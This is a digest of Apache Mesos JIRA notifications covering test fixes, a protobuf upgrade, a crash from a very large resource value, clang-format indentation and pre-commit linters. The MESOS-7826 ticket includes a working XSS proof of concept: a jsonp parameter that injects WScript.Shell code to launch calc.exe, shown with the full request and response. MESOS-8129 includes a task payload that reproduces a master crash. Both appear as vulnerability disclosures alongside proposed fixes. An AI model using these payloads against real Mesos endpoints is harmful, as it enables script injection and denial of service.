> 05:39:39.157635 13787 sched.cpp:869] Will retry registration in 0ns if 
> necessary
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.158979 13785 sched.cpp:836] Sending SUBSCRIBE call to 
> master@172.16.10.95:32856
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.159029 13785 sched.cpp:869] Will retry registration in 0ns if 
> necessary
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.159265 13790 sched.cpp:836] Sending SUBSCRIBE call to 
> master@172.16.10.95:32856
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.159303 13790 sched.cpp:869] Will retry registration in 0ns if 
> necessary
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.159479 13786 sched.cpp:836] Sending SUBSCRIBE call to 
> master@172.16.10.95:32856
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.159521 13786 sched.cpp:869] Will retry registration in 0ns if 
> necessary
> WARN [05:39:39 EventsIntegrationTest-Local

[jira] [Commented] (MESOS-7506) Multiple tests leave orphan containers.

2017-11-13 Thread Alexander Rukletsov (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250352#comment-16250352
 ] 

Alexander Rukletsov commented on MESOS-7506:


{noformat}
Commit: a595bcbf7afd9783e15f3e32cd9e70fa979531df [a595bcb]
Author: Andrei Budnik 
Date: 13 November 2017 at 21:59:17 GMT+1
Committer: Alexander Rukletsov 
Commit Date: 13 November 2017 at 23:15:43 GMT+1

Fixed bug in tests leading to orphaned containers.

Previously, some tests tried to advance the clock until task status
update was sent, while task's container was destroying. Container
destruction consists of multiple steps, where some steps have a timeout
specified, e.g. `cgroups::DESTROY_TIMEOUT`. So, there was a race
between container destruction process and the loop that advanced the
clock, leading to the following outcomes:

  (1) Container destroyed, before clock advancing reaches timeout.

  (2) Triggered timeout due to clock advancing, before container
  destruction completes. That results in leaving orphaned
  containers that will be detected by Slave destructor in
  `tests/cluster.cpp`, so the test will fail.

This change gets rid of the loop and resumes clock after a single
advancing of the clock.

Review: https://reviews.apache.org/r/63589/
{noformat}
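
For reference, the libprocess clock pattern the fix moves to looks roughly 
like this (a sketch only; the real tests also drive specific futures):

{code}
#include <process/clock.hpp>

#include <stout/duration.hpp>

using process::Clock;

// Instead of advancing the clock in a loop (which can trip destruction
// timeouts such as cgroups::DESTROY_TIMEOUT), advance it once past the
// expected delay and then resume, letting real time drive the remaining
// container-destruction steps.
void advanceOnce(const Duration& delay)
{
  Clock::pause();
  Clock::advance(delay);
  Clock::settle();
  Clock::resume();
}
{code}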

> Multiple tests leave orphan containers.
> ---
>
> Key: MESOS-7506
> URL: https://issues.apache.org/jira/browse/MESOS-7506
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
> Environment: Ubuntu 16.04
> Fedora 23
> other Linux distros
>Reporter: Alexander Rukletsov
>Assignee: Andrei Budnik
>  Labels: containerizer, flaky-test, mesosphere
> Attachments: KillMultipleTasks-badrun.txt, 
> ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, 
> RestartSlaveRequireExecutorAuthentication-badrun.txt, 
> TaskWithFileURI-badrun.txt
>
>
> I've observed a number of flaky tests that leave orphan containers upon 
> cleanup. A typical log looks like this:
> {noformat}
> ../../src/tests/cluster.cpp:580: Failure
> Value of: containers->empty()
>   Actual: false
> Expected: true
> Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 }
> {noformat}
> All currently affected tests:
> {noformat}
> ROOT_DOCKER_DockerAndMesosContainerizers/DefaultExecutorTest.KillTask/0
> ROOT_DOCKER_DockerAndMesosContainerizers/DefaultExecutorTest.TaskWithFileURI/0
> ROOT_DOCKER_DockerAndMesosContainerizers/DefaultExecutorTest.ResourceLimitation/0
> ROOT_DOCKER_DockerAndMesosContainerizers/DefaultExecutorTest.KillMultipleTasks/0
> SlaveRecoveryTest/0.RecoverUnregisteredExecutor
> SlaveRecoveryTest/0.CleanupExecutor
> SlaveRecoveryTest/0.RecoverTerminatedExecutor
> SlaveTest.ShutdownUnregisteredExecutor
> SlaveTest.RestartSlaveRequireExecutorAuthentication
> ShutdownUnregisteredExecutor
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8139) Upgrade protobuf to 3.4.x.

2017-11-13 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8139?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8139:
---
Shepherd: Benjamin Mahler

> Upgrade protobuf to 3.4.x.
> --
>
> Key: MESOS-8139
> URL: https://issues.apache.org/jira/browse/MESOS-8139
> Project: Mesos
>  Issue Type: Task
>Reporter: Benjamin Mahler
>Assignee: Dmitry Zhuk
>  Labels: performance
>
> The 3.4.x release includes move support:
> https://github.com/google/protobuf/releases/tag/v3.4.0
> This will provide some performance improvements for us, and will allow us to 
> start using move semantics for messages.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8139) Upgrade protobuf to 3.4.x.

2017-11-13 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8139?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler reassigned MESOS-8139:
--

Assignee: Dmitry Zhuk

> Upgrade protobuf to 3.4.x.
> --
>
> Key: MESOS-8139
> URL: https://issues.apache.org/jira/browse/MESOS-8139
> Project: Mesos
>  Issue Type: Task
>Reporter: Benjamin Mahler
>Assignee: Dmitry Zhuk
>  Labels: performance
>
> The 3.4.x release includes move support:
> https://github.com/google/protobuf/releases/tag/v3.4.0
> This will provide some performance improvements for us, and will allow us to 
> start using move semantics for messages.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8139) Upgrade protobuf to 3.4.x.

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8139?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250412#comment-16250412
 ] 

Benjamin Mahler commented on MESOS-8139:


Funny enough, they just released 3.5.0, with:

{quote}
Added move constructor and move assignment to RepeatedField, RepeatedPtrField
{quote}

https://github.com/google/protobuf/releases/tag/v3.5.0

[~dzhuk] do you want to upgrade instead to 3.5.0 directly to avoid the extra 
bloat in the git repo?

> Upgrade protobuf to 3.4.x.
> --
>
> Key: MESOS-8139
> URL: https://issues.apache.org/jira/browse/MESOS-8139
> Project: Mesos
>  Issue Type: Task
>Reporter: Benjamin Mahler
>  Labels: performance
>
> The 3.4.x release includes move support:
> https://github.com/google/protobuf/releases/tag/v3.4.0
> This will provide some performance improvements for us, and will allow us to 
> start using move semantics for messages.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Comment Edited] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250290#comment-16250290
 ] 

Benjamin Mahler edited comment on MESOS-8129 at 11/13/17 10:54 PM:
---

Thanks Bruce for the well written ticket. Determining the biggest safe scalar 
would take me some time given the fractional component complicates matters over 
integers in doubles (I.e. where we can just use Number.MAX_SAFE_INTEGER).

Also, I'm curious what your use case is, can you tell me?


was (Author: bmahler):
Thanks Bruce for the well written ticket. Determining it more formally would 
take me some time given the fractional component complicates matters over 
integers in doubles (I.e. just use Number.MAX_SAFE_INTEGER).

Also, I'm curious what your use case is, can you tell me?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had led to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is that the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger showed that the CHECK failed due to a rounding error on the order 
> of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Comment Edited] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250290#comment-16250290
 ] 

Benjamin Mahler edited comment on MESOS-8129 at 11/13/17 10:54 PM:
---

Thanks Bruce for the well written ticket. Determining it more formally would 
take me some time given the fractional component complicates matters over 
integers in doubles (I.e. just use Number.MAX_SAFE_INTEGER).

Also, I'm curious what your use case is, can you tell me?


was (Author: bmahler):
Thanks Bruce for the well written ticket. I think I could compute this 
empirically based on adding 0.001 until I see the resultant skip a .001. 
Determining it more formally would take me some time given the fractional 
component complicates matters over integers in doubles (I.e. just use 
Number.MAX_SAFE_INTEGER).

Also, I'm curious what your use case is, can you tell me?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had led to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is that the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger showed that the CHECK failed due to a rounding error on the order 
> of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-5918) Replace jsonp with a more secure alternative

2017-11-13 Thread Alexander Rojas (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-5918?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250447#comment-16250447
 ] 

Alexander Rojas commented on MESOS-5918:


For backwards compatibility, I think it will be a while before we can 
completely remove the {{jsonp}} parameter from our codebase. However, that 
doesn't mean we cannot mitigate the possible attacks by properly validating 
the {{jsonp}} parameter.

As it is currently implemented, we just return whatever value was given in the 
parameter, e.g.:

{code}
return OK(_flags(), request.url.query.get("jsonp"));
{code}

But we should probably validate that {{jsonp}} is just a JS identifier. 
Apparently only Internet Explorer up to version 11 is vulnerable to this 
attack.
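
A minimal sketch of that validation (an illustrative helper, not the actual 
Mesos handler code):

{code}
#include <cctype>
#include <string>

// Accept only values that look like a (possibly dotted) JS identifier,
// e.g. "callback" or "angular.callbacks._0", so that the jsonp response
// cannot be used to inject arbitrary script.
bool isValidJsonpCallback(const std::string& value)
{
  if (value.empty()) {
    return false;
  }

  bool expectStart = true;  // Next char must start an identifier segment.

  for (char c : value) {
    unsigned char u = static_cast<unsigned char>(c);
    if (expectStart) {
      if (!std::isalpha(u) && c != '_' && c != '$') {
        return false;
      }
      expectStart = false;
    } else if (c == '.') {
      expectStart = true;
    } else if (!std::isalnum(u) && c != '_' && c != '$') {
      return false;
    }
  }

  return !expectStart;  // Reject a trailing '.'.
}
{code}

The handler could then drop the parameter (or return a 400) when this check 
fails, instead of echoing the value back verbatim.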

> Replace jsonp with a more secure alternative
> 
>
> Key: MESOS-5918
> URL: https://issues.apache.org/jira/browse/MESOS-5918
> Project: Mesos
>  Issue Type: Improvement
>  Components: webui
>Reporter: Yan Xu
>
> We currently use the {{jsonp}} technique to bypass CORS check. This practice 
> has many security concerns (see discussions on MESOS-5911) so we should 
> replace it with a better alternative.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-7826) XSS in JSONP parameter

2017-11-13 Thread Alexander Rojas (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250448#comment-16250448
 ] 

Alexander Rojas commented on MESOS-7826:


For backwards compatibility, I think it will be a while before we can 
completely remove the {{jsonp}} parameter from our codebase. However, that 
doesn't mean we cannot mitigate the possible attacks by properly validating 
the {{jsonp}} parameter.

As it is currently implemented, we just return whatever value was given in the 
parameter, e.g.:

{code}
return OK(_flags(), request.url.query.get("jsonp"));
{code}

But we should probably validate that {{jsonp}} is just a JS identifier. 
Apparently only Internet Explorer up to version 11 is vulnerable to this 
attack.

> XSS in JSONP parameter
> --
>
> Key: MESOS-7826
> URL: https://issues.apache.org/jira/browse/MESOS-7826
> Project: Mesos
>  Issue Type: Bug
>  Components: json api
> Environment: Running as part of DC/OS in a docker container.
>Reporter: Vincent Ruijter
>Priority: Critical
>
> It is possible to inject arbitrary content into a server request. Take into 
> account the following url: 
> https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
> This will result in the following request:
> {code:html}
> GET 
> /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
>  HTTP/1.1
> Host: xxx.xxx.com
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 
> Firefox/54.0
> Accept: */*
> Accept-Language: en-US,en;q=0.5
> [...SNIP...]
> {code}
> The server response:
> {code:html}
> HTTP/1.1 200 OK
> Server: openresty/1.9.15.1
> Date: Tue, 25 Jul 2017 09:04:31 GMT
> Content-Type: text/javascript
> Content-Length: 1411637
> Connection: close
> var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 
> 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01
>  19:16:40","build_time":149634
> [...SNIP...]
> {code}
> On Internet Explorer this will trigger a file download, and when executing 
> the file (state.js), it will pop-up a calculator. It's my recommendation to 
> apply input validation on this parameter, to prevent abuse.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-3083) Doing 'clone' on Linux with the CLONE_NEWUSER namespace type can drop root privileges.

2017-11-13 Thread James Peach (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-3083?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250452#comment-16250452
 ] 

James Peach commented on MESOS-3083:


This test is running a task that enters a set of new namespaces, then attempts 
to escalate back to the set of root namespaces. This isn't something that we 
would expect to work with user namespaces (in fact, we should expect that user 
namespaces would explicitly prevent this).

> Doing 'clone' on Linux with the CLONE_NEWUSER namespace type can drop root 
> privileges.
> --
>
> Key: MESOS-3083
> URL: https://issues.apache.org/jira/browse/MESOS-3083
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
> Environment: Ubuntu 14.04 (virtual machine)
>Reporter: Benjamin Hindman
>  Labels: mesosphere
>
> The namespace tests attempt to clone a process with all namespaces that are 
> available from the kernel which includes the 'user' namespace in Ubuntu 14.04 
> which causes the child process to be user 'nobody' instead of user 'root' 
> after invoking 'clone' which is bad because the test requires that the child 
> process is 'root' and so things fail (because of insufficient permissions). 
> For now, we explicitly ignore the 'user' namespace in the tests, but this 
> issue is to track exactly how we might want to manage this going forward.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8174) clang-format incorrectly indents aggregate initializations

2017-11-13 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8174?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8174:

Description: 
Aggregate initializations are incorrectly indented. I would expect the 
following indention,

{code}
Foo bar{
123,
456,
789};
{code}

Instead this is indented as

{code}
Foo bar{123,
456,
789};
{code}

Forcing a line break after the opening curly incorrectly indents the arguments 
with two instead of four spaces,

{code}
Foo bar{

  123,
  456,
  789};
{code}

The [Google C++ style 
guide|https://google.github.io/styleguide/cppguide.html#Braced_Initializer_List_Format]
 suggests to
{quote}
Format a braced initializer list exactly like you would format a function call 
in its place.
{quote}
and our style guide demands
{quote}
Newline when calling or defining a function: indent with four spaces.
{quote}

  was:
Aggregate initializations are incorrectly indented. I would expect the 
following indention,

{code}
Foo bar{
123,
456,
789};
{code}

Instead this is indented as

{code}
Foo bar{123,
456,
789};
{code}

Forcing a line break after the opening curly incorrectly indents the arguments 
with two instead of four spaces,

{code}
Foo bar{

  123,
  456,
  789};
{code}


> clang-format incorrectly indents aggregate initializations
> --
>
> Key: MESOS-8174
> URL: https://issues.apache.org/jira/browse/MESOS-8174
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Bannier
>  Labels: clang-format
>
> Aggregate initializations are incorrectly indented. I would expect the 
> following indention,
> {code}
> Foo bar{
> 123,
> 456,
> 789};
> {code}
> Instead this is indented as
> {code}
> Foo bar{123,
> 456,
> 789};
> {code}
> Forcing a line break after the opening curly incorrectly indents the 
> arguments with two instead of four spaces,
> {code}
> Foo bar{
>   123,
>   456,
>   789};
> {code}
> The [Google C++ style 
> guide|https://google.github.io/styleguide/cppguide.html#Braced_Initializer_List_Format]
>  suggests to
> {quote}
> Format a braced initializer list exactly like you would format a function 
> call in its place.
> {quote}
> and our style guide demands
> {quote}
> Newline when calling or defining a function: indent with four spaces.
> {quote}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8198) Update the ReconcileOfferOperations protos

2017-11-13 Thread Greg Mann (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8198?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250472#comment-16250472
 ] 

Greg Mann commented on MESOS-8198:
--

Review here: https://reviews.apache.org/r/63768/

> Update the ReconcileOfferOperations protos
> --
>
> Key: MESOS-8198
> URL: https://issues.apache.org/jira/browse/MESOS-8198
> Project: Mesos
>  Issue Type: Task
>Reporter: Gastón Kleiman
>Assignee: Greg Mann
>  Labels: mesosphere
>
> Some protos have been committed, but they follow an event-based API.
> We decided to follow the request/response model for this API, so we need to 
> update the protos.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8174) clang-format incorrectly indents aggregate initializations

2017-11-13 Thread Andrew Schwartzmeyer (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8174?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250480#comment-16250480
 ] 

Andrew Schwartzmeyer commented on MESOS-8174:
-

I was surprised to see this formatting take place:

{noformat}
// 4: OK.
allocator->resourcesRecovered(
frameworkId,
agentId,
resources,
filters);

// 5: OK.
allocator->resourcesRecovered(
frameworkId, agentId, resources, filters);
{noformat}

However, that example is from the style-guide. While patched {clang-format} 
preferred {5}, it's not (necessarily) a bug.

> clang-format incorrectly indents aggregate initializations
> --
>
> Key: MESOS-8174
> URL: https://issues.apache.org/jira/browse/MESOS-8174
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Bannier
>  Labels: clang-format
>
> Aggregate initializations are incorrectly indented. I would expect the 
> following indention,
> {code}
> Foo bar{
> 123,
> 456,
> 789};
> {code}
> Instead this is indented as
> {code}
> Foo bar{123,
> 456,
> 789};
> {code}
> Forcing a line break after the opening curly incorrectly indents the 
> arguments with two instead of four spaces,
> {code}
> Foo bar{
>   123,
>   456,
>   789};
> {code}
> The [Google C++ style 
> guide|https://google.github.io/styleguide/cppguide.html#Braced_Initializer_List_Format]
>  suggests to
> {quote}
> Format a braced initializer list exactly like you would format a function 
> call in its place.
> {quote}
> and our style guide demands
> {quote}
> Newline when calling or defining a function: indent with four spaces.
> {quote}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8174) clang-format incorrectly indents aggregate initializations

2017-11-13 Thread Andrew Schwartzmeyer (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8174?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250479#comment-16250479
 ] 

Andrew Schwartzmeyer commented on MESOS-8174:
-

According to the style guide, this depends on the length of the first line:

{noformat}
// 3: Don't use in this case due to "jaggedness".
allocator->resourcesRecovered(frameworkId,
  agentId,
  resources,
  filters);

// 3: In this case, 3 is OK.
foobar(someArgument,
   someOtherArgument,
   theLastArgument);
{noformat}

So for {{Foo bar\{}} I think it's behaving appropriately.

> clang-format incorrectly indents aggregate initializations
> --
>
> Key: MESOS-8174
> URL: https://issues.apache.org/jira/browse/MESOS-8174
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Bannier
>  Labels: clang-format
>
> Aggregate initializations are incorrectly indented. I would expect the 
> following indention,
> {code}
> Foo bar{
> 123,
> 456,
> 789};
> {code}
> Instead this is indented as
> {code}
> Foo bar{123,
> 456,
> 789};
> {code}
> Forcing a line break after the opening curly incorrectly indents the 
> arguments with two instead of four spaces,
> {code}
> Foo bar{
>   123,
>   456,
>   789};
> {code}
> The [Google C++ style 
> guide|https://google.github.io/styleguide/cppguide.html#Braced_Initializer_List_Format]
>  suggests to
> {quote}
> Format a braced initializer list exactly like you would format a function 
> call in its place.
> {quote}
> and our style guide demands
> {quote}
> Newline when calling or defining a function: indent with four spaces.
> {quote}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Comment Edited] (MESOS-8174) clang-format incorrectly indents aggregate initializations

2017-11-13 Thread Andrew Schwartzmeyer (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8174?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250480#comment-16250480
 ] 

Andrew Schwartzmeyer edited comment on MESOS-8174 at 11/13/17 11:25 PM:


I was surprised to see this formatting take place:

{noformat}
// 4: OK.
allocator->resourcesRecovered(
frameworkId,
agentId,
resources,
filters);

// 5: OK.
allocator->resourcesRecovered(
frameworkId, agentId, resources, filters);
{noformat}

However, that example is from the style-guide. While patched {{clang-format}} 
preferred *5*, it's not (necessarily) a bug.


was (Author: andschwa):
I was surprised to see this formatting take place:

{noformat}
// 4: OK.
allocator->resourcesRecovered(
frameworkId,
agentId,
resources,
filters);

// 5: OK.
allocator->resourcesRecovered(
frameworkId, agentId, resources, filters);
{noformat}

However, that example is from the style-guide. While patched {clang-format} 
preferred {5}, it's not (necessarily) a bug.

> clang-format incorrectly indents aggregate initializations
> --
>
> Key: MESOS-8174
> URL: https://issues.apache.org/jira/browse/MESOS-8174
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Bannier
>  Labels: clang-format
>
> Aggregate initializations are incorrectly indented. I would expect the 
> following indention,
> {code}
> Foo bar{
> 123,
> 456,
> 789};
> {code}
> Instead this is indented as
> {code}
> Foo bar{123,
> 456,
> 789};
> {code}
> Forcing a line break after the opening curly incorrectly indents the 
> arguments with two instead of four spaces,
> {code}
> Foo bar{
>   123,
>   456,
>   789};
> {code}
> The [Google C++ style 
> guide|https://google.github.io/styleguide/cppguide.html#Braced_Initializer_List_Format]
>  suggests to
> {quote}
> Format a braced initializer list exactly like you would format a function 
> call in its place.
> {quote}
> and our style guide demands
> {quote}
> Newline when calling or defining a function: indent with four spaces.
> {quote}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8217) Don't run linters on every commit

2017-11-13 Thread Benno Evers (JIRA)
Benno Evers created MESOS-8217:
--

 Summary: Don't run linters on every commit
 Key: MESOS-8217
 URL: https://issues.apache.org/jira/browse/MESOS-8217
 Project: Mesos
  Issue Type: Bug
Reporter: Benno Evers


The Mesos `pre-commit` hook currently runs several linters on the source code, 
some of which are even dynamically installed from the internet during a commit.

This can hinder development because it also applies to local commits that are 
never intended to be published, and it can quickly become annoying when 
rebasing old branches.

Instead, we should think about putting these hooks into a separate 
`support/verify-reviews.py`, which would be executed when trying to post a 
review, since at that point the patches should be cleaned up and pass all 
linter checks.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250507#comment-16250507
 ] 

Benjamin Mahler commented on MESOS-8129:


Did a binary search and found that the largest 0.001 precision value such that 
precision appears to be lost when incrementing by another 0.001 is: 
8,796,093,022,208.000. Another 0.001 increment moves this to 
8,796,093,022,208.002. This was tested with Apple's clang {{Apple LLVM version 
9.0.0 (clang-900.0.38)}}.

We could perhaps validate a limit of 2^32 which is a little less than half of 
this limit: 4,294,967,296. cc [~mcypark]

[~bmerry] would you be able to send a pull request with the added validation?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had led to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is that the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger showed that the CHECK failed due to a rounding error on the order of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
